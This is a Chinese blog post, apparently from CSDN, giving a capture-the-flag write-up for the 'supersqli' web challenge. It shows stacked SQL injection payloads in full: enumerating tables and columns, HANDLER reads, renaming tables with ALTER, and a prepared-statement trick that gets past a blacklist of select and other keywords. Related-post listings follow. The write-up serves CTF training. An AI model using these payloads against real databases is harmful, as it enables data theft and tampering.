【愚公系列】2023年05月 攻防世界-Web(supersqli)

已于 2023-05-26 09:27:18 修改
阅读量3.8w 收藏 3
点赞数 2
分类专栏: # CTF-攻防世界-WEB 文章标签: 前端 web安全 安全 系统安全 网络安全
于 2022-01-24 22:03:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aa2528877987/article/details/122675704
版权

文章目录

前言

SQL注入攻击是一种常见的网络攻击方式,攻击者通过在用户输入的数据中插入恶意代码,从而获取数据库中的敏感信息或者执行未授权的操作。为了防范SQL注入攻击,我们应该在应用程序中使用参数化查询这样的安全措施来防范这种攻击。同时,我们还应该加强数据过滤和输入验证,以确保用户输入的数据符合预期的格式和类型。

一、supersqli

1.题目

在这里插入图片描述

2.答题

输入1’发现不回显,然后1’ #显示正常,判断是存在sql注入了

在这里插入图片描述
在这里插入图片描述
order by 2的时候是正常回显了,order by 3就出错了,只有2个字段,这时候用1' union select 1,2,#进行联合查询,发现关键字被正则过滤return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入

在这里插入图片描述
尝试堆叠注入-1';show tables #
在这里插入图片描述
查询两张表名字段

-1';show columns from `1919810931114514` #

-1';show columns from `words` #

在这里插入图片描述
在这里插入图片描述

2.1 handler查询法

-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

在这里插入图片描述

2.2 修改原查询法

//修改表
1'; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#
//在查询
1' or 1=1#

知道原查询就在表words的字段id里头了

将放着flag的表1919810931114514名字改成words

alter table `1919810931114514` rename to words

表里头字段名flag改成id

在这里插入图片描述

2.3 预编译绕过法

-1';set @sql = CONCAT('sele','ct flag from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;#
愚公搬代码
关注
专栏目录
愚公系列202305 Web渗透测试之SQL注入(sqli-labs、Less-23-28)
时光隧道
08-02 5万+
SQL注入是一种常见的攻击方式,它利用应用程序未对用户输入的数据进行正确的过滤和验证,以达到访问或篡改系统数据的目的。具体来说,攻击者可以在注入点上构造恶意的SQL语句,并成功提交给数据库执行,从而造成数据泄露、篡改或者破坏。SQL注入攻击的应用场景非常广泛,常见于Web应用、数据库应用或其他需要使用SQL语句进行数据操作的应用中。SQL注释符是一种用于在SQL语句中注释代码的特殊符号,例如"–“或”/* */"。SQL注入攻击者可以利用注释符号来注入恶意代码。
愚公系列202305 Web渗透测试之url跳转攻击
热门推荐
时光隧道
08-25 5万+
URL跳转漏洞是一种常见的安全漏洞,攻击者通过构造恶意的URL链接,将用户引导到可信站点外的恶意网站或者下载恶意文件,从而实施网络攻击。攻击者可以利用这种漏洞在用户的浏览器中打开恶意网站,或者在用户机器上下载恶意软件。
【XCTF 攻防世界WEB 高手进阶区 supersqli(三种方法)
weixin_45844670的博客
08-27 727
这道题有多种方法方法一(堆叠注入+rename&alter)方法二(handler)方法三(预编译) 方法一(堆叠注入+rename&alter) 就是可以堆一堆sql注入进行注入,这个时候我们就不受前面语句的限制可以为所欲为了。其原理也很简单,就是将原来的语句构造完后加上分号,代表该语句结束,后面在输入的就是一个全新的sql语句了,这个时候我们使用增删查改毫无限制。 相关知识补充: https://www.jianshu.com/p/c50ced83414d https://blog.cs
攻防世界web新手练习012 simple_js
weixin_43545225的博客
09-13 3411
攻防世界web新手练习012 simple_js 难度系数:2 题目描述: 小宁发现了一个网页,但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} ) 题目场景: http://111.200.241.244:52823 输入了一些简单的密码如:123456、admin等,都显示同一个结果。 解题思路 遇见web题目,习惯性F12看一下控制台。 嗯,js写了这么多,线索肯定在js代码里面没跑儿。 解析关键代码 看了一圈,感觉这个x开头有点东西,拿去程序输出一下。
攻防世界supersqli做题思路(堆叠注入,select绕过)
最新发布
2301_80307383的博客
07-12 566
测试可知,words中的id有正常回显,可把flag所在的表和列改名为id所在的表和列。在尝试大小写,双写,加注释也没能绕过select,尝试堆叠注入。prepare用于预备一个语句,并赋予名称,以后可以引用该语句。打开题目,在已知为sql注入时,先测试闭合方式,输入1\。发现报错,接着尝试1' 和 1" 测试出闭合方式为单引号。接着访问1' or 1#即可得到flag。
攻防世界-supersqli
weixin_43960066的博客
03-27 441
由于没有对alter,rename做出过滤,将1919810931114514修改为words,将flag修改为id,同时将words修改为其他的,将id也修改为其他的。由于过滤了一些关键字,所以想要得到flag可采取预编译、修改flag的名字为id修改1919810931114514为words(即可在搜索框中直接输入即可)发现flag在数字表中,同时判断当前正在使用的就是supersqli这个数据库,输入框中输入1就是查询的word表。想要得到flag需要使用的语句为。使用堆叠注入,查看数据库。
攻防世界supersqli(堆叠注入)
2302_79800344的博客
04-09 952
进入题目环境,有输入框与注入参数,推测类型为SQL注入:测试--注入类型为数字型还是字符型,构造payload:?inject=1 or 1=2 并提交: 发现页面依然正常,说明注入类型为字符型,则继续检查闭合方式,首先尝试单引号闭合,构造payload: ?inject=1' --+证实了闭合方式为单引号,继续测试字段数目(order by / group by ),经测试,字段数目为2。接着开始注数据库名,表名等关键信息:首先尝试Union联合注入---构造payload: ?inject=1' uni
愚公系列202305 Web渗透测试之SQL注入(sqli-labs、Less-1)
时光隧道
07-14 5万+
SQL注入是一种常见的攻击方式,它利用应用程序未对用户输入的数据进行正确的过滤和验证,以达到访问或篡改系统数据的目的。具体来说,攻击者可以在注入点上构造恶意的SQL语句,并成功提交给数据库执行,从而造成数据泄露、篡改或者破坏。SQL注入攻击的应用场景非常广泛,常见于Web应用、数据库应用或其他需要使用SQL语句进行数据操作的应用中。order by -- + 判断字段数目union select -- + 联合查询收集信息。
愚公系列202305 Web渗透测试之XML攻击
时光隧道
08-25 5万+
XML攻击是一种利用XML文件中的漏洞攻击系统的攻击方法。攻击者可以通过构造恶意的XML文件,使系统解析XML文件时受到攻击,导致系统崩溃、泄漏敏感信息等安全问题。XML攻击的常见类型包括XML注入攻击、XXE攻击、XPath注入攻击等。为防范XML攻击,可以采用严格的XML解析方式、限制外部实体引用等安全措施。
愚公系列202305 Web渗透测试之支付逻辑攻击
时光隧道
08-25 5万+
支付逻辑攻击是指攻击者利用支付系统的漏洞或错误设计,以不正当的方式获取支付服务提供商的服务或客户的资金,并将其转移到攻击者控制的账户中。常见的支付逻辑攻击包括退款欺诈、交易重放、交易篡改等。攻击者通过操纵支付参数、发送虚假信息等手段欺骗支付系统实现攻击目的。
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询框里过滤了,在url框里没有) 在使用union select时发现过滤关键字 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200313161718411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpd
攻防世界supersqli
zara_anna的博客
07-27 227
假设注入类型为数字型,注入点为id,分别输入上面的语句,那么第一行测试语句会返回id为1的查询结果,而第二行语句由于条件and 1=2不成立,所以查询结果为空。如果注入类型为字符型,将上面语句拼接到sql中,由于id的值都不匹配,所以应该是都不返回任何结果,但是如果id本身是int类型,实际查询过程中是会返回结果的,这可能是因为对输入的字符进行了截断并转换了类型,造成1 and 1=2在字符类型中会返回id为1的查询结果。
攻防世界---web---supersqli
2201_75556700的博客
05-18 533
5、这里可以使用堆叠绕过(以分号来隔开每一次的sql语句的查询),查数据库名,再结合题目的提示可知,我们要找的信息在"supersqli"这个数据库中。6、查询"supersqli"数据库中的表名,使用下面的方法,查到了两张表。8、看到了flag字段,接着查询flag字段里面的信息。7、查询字段,由于表名是字符串,所以需要用``反引号。2、判断注入点,这里输入1'报错了,说明存在注入点。4、查看数据库名,这里发现select被过滤了。3、查看列数,根据结果显示可知,有2列。的表,并将其命名为 p。
攻防世界bug
xiaoqi199915的博客
06-02 1759
尝试弱口令和万能密码 首先你应该登录 进行注册 但是自己没有注册成功 登录自己的账号密码 并未发现什么 需要管理员权限进行登录 进行忘记密码进行秘密 burp 进行抓包 账号名改成admin 密码是自己注册的密码进行发包 登陆成功 admin权限 点manage发现出现IP IP问题 进行X-Forwarded-For :127.0.0.1 进行审查源码 发现index.php?module=filemanage&do=??? 那么do后面能是什么呢 猜测upload 写一个php代码 改为.
攻防世界supersqli
金 帛的博客
03-08 7876
攻防世界WP
sql注入限制关键字(SELECT)使用HANDLER查询 [GYCTF2020]Blacklist
alatan9的博客
02-12 191
[GYCTF2020]Blacklist
攻防世界】五 --- supersqli
qq_43168364的博客
12-23 428
题目 — supersqli 一、writeup 二、知识点
攻防世界 pwn 新手练习区 level0
ChaoYue_miku的博客
07-01 589
题目来源: XMan 题目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 0、根据题目描述,猜测是栈溢出漏洞,使用checksec检查保护机制,同时运行一下文件。 64位文件,开启了NX保护 1、使用IDA 64 Pro打开文件 read()函数明显存在栈溢出漏洞,buf距离栈底0x80个字节,然而read函数可以读取0x200个字节,查看一下栈结构。 这里可以覆盖返回地址,执行需要的函数 发现存在callsystem()函数,将返回值跳转到这个函数,可以直接getshell, 查看一下函数地址
攻防世界upload
07-28
- *1* *3* [【愚公系列202305 攻防世界-Web(upload1)](https://blog.csdn.net/aa2528877987/article/details/122691473)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愚公搬代码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值